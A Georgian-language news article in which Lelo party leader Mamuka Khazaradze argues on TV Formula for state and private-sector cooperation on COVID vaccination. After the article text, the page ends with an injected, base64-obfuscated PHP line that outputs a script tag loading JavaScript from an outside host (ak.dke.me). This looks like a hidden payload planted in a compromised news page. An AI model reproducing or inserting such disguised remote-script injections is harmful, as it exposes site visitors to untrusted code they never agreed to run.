celsiusi
ავერსი საქკაბელი
“ლელოს” ლიდერის, მამუკა ხაზარაძის თქმით, იმისთვის, რომ საქართველოს მოსახლეობა რაც შეიძლება სწრაფად აიცრას, აუცილებელია კერძო სექტორისა და სახელმწიფოს თანამშრომლობა. ამის შესახებ ხაზარაძემ ტელეკომპანია “ფორმულას” ეთერში ისაუბრა.
 
ხაზარაძის განმარტებით, კერძო სექტორის როლი ვაქცინაციის პროცესში უნდა გამოიხატებოდეს კონტაქტების მოიძიებითა და დაფინანსებით, სახელმწიფომ კი დანარჩენ საკითხებზე უნდა იმუშაოს:
 
“ბიზნესთან უნდა ყოფილიყო საუბარი, რომ აბა, მეგობრებო, ვის სად შეგიძლიათ თქვენი კონტაქტებით, თქვენი ფინანსებით ჩაერთოთ ამ პროცესში. მაგრამ ეს არ ნიშნავს, რომ სამშენებლო კომპანიის ხელმძღვანელი იყიდის ვაქცინას და მერე თვითონ გაუკეთებს შპრიცებს თავის თანამშრომლებს, ან გაყიდის რა ფასადაც უნდა. აქ ლაპარაკია იმ კონტაქტების გამოყენებაზე, რომლებიც ქართველ ბიზნესმენებს გააჩნიათ მთელი მსოფლიოს მასშტაბით.
 
მაგალითად, ჩემი მეგობარი ჰარვარდიდან არის ინდოეთის პრემიერ-მინისტრის მრჩეველი. ჩვენ ხომ ერთი წელია ვეხვეწებით მთავრობას, რომ ომია, პანდემიაა და გაითვალისწინეთ ჩვენი შეთავაზებები. მე რომ დავურეკო, არასერიოზული იქნება, თუ სახელმწიფოსა და კერძო სექტორის ერთობლივი გეგმა არ იქნება და არ მიჰყვება ამას მინიმუმ მინისტრის ან პრემიერ-მინისტრის ვიზიტი ან ზარი იქაურ პრემიერ-მინისტრთან და როცა ისინი აწარმოებენ 25 მილიონს, სიტყვაზე ვამბობ, ჩვენ უნდა ვუთხრათ, რომ 200 ათასი გამოგივყონ”, – განმარტა ხაზარაძემ.
 
მისი თქმით, სახელმწიფომ უნდა მოილაპარაკოს კერძო სექტორის წარმომადგენლებთან, რომ მათ თავიანთი თანამშრომლები აცრან, რაც ხაზარაძის თქმით, სახელმწიფო ხარჯებს შეამცირებს:
 
“ეს ყველაფერი უნდა შეასრულოს ჯანდაცვის სამინისტრომ. ანუ ბიზნესი ერევა კონტაქტებში და დაფინანსებაში. დანარჩენი, ნემსის კეთებაში და ყველა სხვა პროცედურაში უნდა იყოს სახელმწიფო. ეს არის კლასკური მაგალითი, როგორ უნდა იმოქმედოს კერძო და საჯარო სექტორმა. ეს არ იქნება კომერციული, არამედ მათი ამოცანაა, რომ ქვეყნის მოსახლეობა რაც შეიძლება მალე აიცრას, ამისთვის კი კერძო სექტორს სახლემწიფო სტრუქტურების მხარდაჭერა სჭირდება”, – განაცხადა ხაზარაძემ.
1238
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");